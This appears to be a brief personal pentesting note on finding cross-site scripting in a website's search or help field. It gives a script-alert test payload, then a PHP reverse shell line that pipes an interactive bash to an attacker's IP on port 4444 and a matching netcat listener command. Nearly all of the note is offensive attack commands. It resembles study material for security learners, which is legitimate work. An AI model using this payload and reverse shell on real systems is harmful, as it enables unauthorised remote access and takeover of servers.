XXS

help section of website
search field
“xxx” if returns "'xxx' not found, may be vulnerable to xxs
search field

<script>alert('hacked')</script> to test XXS vuln  

PHP [[reverse shell]]
exec("/bin/bash -c 'bash -i >& /dev/tcp/’attacking ip'/4444 0>&1'");
Run [[nc]] -lvp 4444